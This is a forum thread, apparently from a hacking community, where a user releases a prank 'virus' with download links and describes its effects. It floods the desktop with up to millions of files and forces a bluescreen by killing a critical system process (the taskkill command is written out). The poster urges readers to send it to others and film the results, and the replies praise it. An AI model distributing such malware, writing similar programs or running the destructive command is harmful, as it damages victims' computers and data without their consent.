Ayy Lmao Virus Release
by zombie2522 - February 18, 2016 at 08:52 PM
hope you find it interesting.
Please reply videos where you send people the file.

DOWNLOAD LINK:
Ayy Lmao Virus

INFO:

This file does not go in the startup folder. I tried, but i ended up getting an error. So instead of researching, i just ignored it. 
Once you run the program, a sound will play, then a lot of aliens will pop up with a text saying Ayy Lmao.
Meanwhile, up to 3 million files will try to be added to the desktop. (couldn't test because afraid of crashing my computer, but i tried with 3000)
If the person is using an ssd, means that the files will be created faster than ever.
It will keep spamming, and it won't close unless you go to the task manager.
(that's the only problem)
but, if the file is running for more than 60 seconds, the computer will get a bluescreen. (taskkill /F /IM csrss.exe)

I tried to recreate the original virus as much as possible taken from this video: ayylmao.mp4
And instead of posting a screenshot, i would rather say that you should go watch that video and that's BASICLY how it is.

If there is something you don't like and wants to get updated, just reply on this post.
Have fun.
>afraid of crashing my computer

>not using vm with controlled space
new download: https://mega.nz/#!vk5gQK4T!1eSNmcpEJNlGf...Tv2PEO72vE
wrong forum area retard
tfw rat and rf gets taken down
Approved

:^)
(February 18, 2016 at 08:52 PM)zombie2522 Wrote: hope you find it interesting.
Please reply videos where you send people the file.

DOWNLOAD LINK:
Ayy Lmao Virus

INFO:

This file does not go in the startup folder. I tried, but i ended up getting an error. So instead of researching, i just ignored it. 
Once you run the program, a sound will play, then a lot of aliens will pop up with a text saying Ayy Lmao.
Meanwhile, up to 3 million files will try to be added to the desktop. (couldn't test because afraid of crashing my computer, but i tried with 3000)
If the person is using an ssd, means that the files will be created faster than ever.
It will keep spamming, and it won't close unless you go to the task manager.
(that's the only problem)
but, if the file is running for more than 60 seconds, the computer will get a bluescreen. (taskkill /F /IM csrss.exe)

I tried to recreate the original virus as much as possible taken from this video: ayylmao.mp4
And instead of posting a screenshot, i would rather say that you should go watch that video and that's BASICLY how it is.

If there is something you don't like and wants to get updated, just reply on this post.
Have fun.
Lol nice thank you for sharing
Looooolll thanks for sharing brooo
Ty for the release of this
Ayyyyyyyyyy lmaoooooooooo virus
Awesome virus u shared....

Possibly Related Threads…
Thread Author Replies Views Last Post
System32 Virus Remover *REVIEWED* eswan2012 30 57,959 August 10, 2021 at 08:26 AM
Last Post: Didx84di
Offical looking system32 Virus removal tool Spooky 90 41,755 August 05, 2021 at 08:33 AM
Last Post: dange20000000
Looking for Moon Man virus SentinelReapz 39 22,193 August 05, 2021 at 08:32 AM
Last Post: dange20000000